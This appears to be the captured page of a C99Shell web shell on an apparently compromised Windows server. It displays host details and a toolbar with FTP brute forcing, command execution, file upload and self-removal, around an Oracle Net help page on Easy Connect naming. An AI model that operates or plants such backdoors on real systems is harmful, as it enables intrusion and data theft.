!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\oracle\product\10.2.0\client_2\NETWORK\tools\help\ca\help\   drwxrwxrwx
Free 4.94 GB of 239.26 GB (2.07%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Naming_Methods_Configuration_Easy_Connect.htm (8.75 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Naming Methods Configuration, Easy Connect Naming

Naming Methods Configuration, Easy Connect Naming

The easy connect naming method can eliminate the need for service name lookup in the tnsnames.ora files for TCP/IP environments. Easy connect naming provides out-of-the-box TCP/IP connectivity to databases. The easy connect naming method extends the functionality of the host naming method by enabling clients to connect to a database server with an optional port number, service name, and instance name in addition to the host name of the database:

CONNECT username/password@host[:port][/service_name][/instance_name]

The easy connect naming connect string converts into the following connect descriptor:

(DESCRIPTION=
 (ADDRESS=(PROTOCOL=tcp)(HOST=host)(PORT=1521))
 (CONNECT_DATA=
   (SERVICE_NAME=service_name)


   (INSTANCE_NAME=instance_name)))

For example, the following connect identifiers connect the client to database service sales.us.acme.com with a listening endpoint of 1521 on database server sales-server:

  • CONNECT username/password@sales-server:1521/sales.us.acme.com

  • CONNECT username/password@sales-server/sales.us.acme.com

  • CONNECT username/password@sales.us.acme.com

These connect strings convert into the following connect descriptor:

(DESCRIPTION=
 (ADDRESS=(PROTOCOL=tcp)(HOST=sales-server)(PORT=1521))
 (CONNECT_DATA=
   (SERVICE_NAME=sales.us.acme.com)))

 

Note: Oracle Net Configuration Assistant provides basic configuration. For more advanced configuration operations, or to configure other portions of Oracle Net that this tool does not cover, use the Oracle Net Manager.

 
 

See Also: Chapter "Configuring Naming Methods" in the Oracle Net Services Administrator's Guide for information about using the easy connect naming method

 

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--